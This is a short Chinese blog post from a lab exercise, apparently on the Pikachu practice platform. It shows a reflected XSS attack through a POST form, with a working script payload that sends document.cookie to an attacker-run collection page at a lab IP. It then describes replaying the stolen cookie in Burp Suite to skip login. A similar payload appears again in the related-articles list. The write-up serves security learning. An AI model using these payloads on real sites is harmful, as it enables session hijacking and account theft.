首页 > 其他分享 >反射型xss的post请求获取cookie

反射型xss的post请求获取cookie

时间:2024-03-01 17:57:17浏览次数:22  
标签:xss 步骤 192.168 获取 cookie 服务器 post

攻击者构造的网站地址:192.168.10.12:100
受害者主机:192.168.10.134
目标服务器:192.168.10.1
步骤一:
受害者主机访问目标服务器

根据提示登录
步骤二:
输入xss Payload
<script>document.location = 'http://192.168.10.12:100/pkxss/xcookie/cookie.php?cookie='+document.cookie</script>
点击”submit“
步骤三:
访问攻击者网站,点击查看获取的cookie

步骤四:
用另外的浏览器访问目标服务器,并用burpsuit进行拦截,将拦截的数据中的cookie用步骤三中获取的cookie替换,然后放行,可以看见页面未登录直接跳转。


如图,越过成功。

标签:xss,步骤,192.168,获取,cookie,服务器,post
From: https://www.cnblogs.com/laibunizi/p/18047624

相关文章

  • PostgresSQL如何安装第三方插件?
    第三方插件安装进入第三方插件源码目录中,定义PATH或者PG_CONFIG环境变量#示例,将pg的bin目录exportPATH:exportPATH=/data/postgres/13/bin:$PATH#或者exportPG_CONFIG=/data/postgres/13/bin/pg_config编译安装gmake&&gmakeinstallgmakeinstall后会在pg......
  • postgresql数据库的备份和还原
    将文件备份还原C:\ProgramFiles\PostgreSQL\9.0\bin>pg_dump-Upostgres-hlocalhost-p5432tlcdata>output_file.sqlC:\ProgramFiles\PostgreSQL\16\bin>psql-Upostgres-hlocalhost-p5432-dtlcdata-foutput_file.sql 包含角色-CC:\Program......
  • 核心子方法5: invokeBeanFactoryPostProcessors(beanFactory)方法详解
    先总结: 该方法通过指定顺序,遍历调用各种实现了BeanDefinitionRegistryPostProcessor接口或BeanFactoryPostProcessor接口,的beanFactory后处理器注: BeanDefinitionRegistryPostProcessor接口继承了BeanFactoryPostProcessor接口调用顺序: 1.先调用已经提前放入Applicat......
  • OpenEuler 安装PostgreSQL
    在openEuler22.03系统上安装Redis并设置为可以远程访问需要几个步骤。以下是一个基本的指南,由于我无法直接操作您的系统,以下步骤可能需要根据实际情况稍作调整。步骤1:安装Redis首先,您需要使用命令行安装Redis。通常情况下,您可以通过系统的包管理器来安装。由于openEu......
  • 核心子方法4: postProcessBeanFactory(beanFactory)方法详解
    先总结: 子类覆盖方法做额外的处理,此处我们自己一般不做任何扩展工作,但是可以查看web中的代码,是有具体实现的AnnotationConfigWebApplicationContext->AbstractRefreshableWebApplicationContext的实现:1.设置ServletContextAwareProcessor后处理器, 并设置忽略......
  • 第二十六天:PostgreSQL体系架构和备份
    一、PostgreSQL体系架构 1、体系架构概览PostgresQL和MySQL相似,也采用典型的C/S模型。PostgresQL体系结构分两部分实例instance磁盘存储实例instance包括进程.内存存储结构 2、进程和内存结构 (1)进程Postmaster主进程它是整个数据库实例的......
  • PostgreSQL从小白到高手教程 - 第45讲:poc-tpcc测试
       PostgreSQL从小白到专家,是从入门逐渐能力提升的一个系列教程,内容包括对PG基础的认知、包括安装使用、包括角色权限、包括维护管理、、等内容,希望对热爱PG、学习PG的同学们有帮助,欢迎持续关注CUUGPG技术大讲堂。 第45讲:POC-TPCC测试 PostgreSQL第45讲:3月2日(周六)......
  • 学习之Cookie
    1.2.3Cookie的提交路径访问互联网资源时不能每次都需要把所有Cookie带上。访问不同的资源时,可以携带不同的cookie,我们可以通过cookie的setPath(Stringpath)对cookie的路径进行设置从ServletA中获取cookiepublicclassServletAextendsHttpServlet{@Override......
  • chromedriver 自动下载链接进行文件下载 (保持系统人工登录的状态,使用已打开的浏览器人
    需求:爬取需要登录系统才能访问页面,且知道系统登录账号解决方法:参考:https://blog.csdn.net/qq_39835505/article/details/124712410   感谢博主!自己打开Chrome浏览器,登录系统,使用chromedriver调用已开的Chrome浏览器打开自动下载链接进行文件下载解决步骤:......
  • xss利用之盗取cookie示例
    实验环境目标网站:宿主机:192.168.10.1访问虚拟机win11:192.168.10.134伪造网站:192.168.10.12:100pikachu步骤一:受害者cookie:步骤二:输入xsspayload'"><script>document.location='http://192.168.10.12:100/pikachu/pkxss/xccokie/cookie.php?cookie='+doc......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99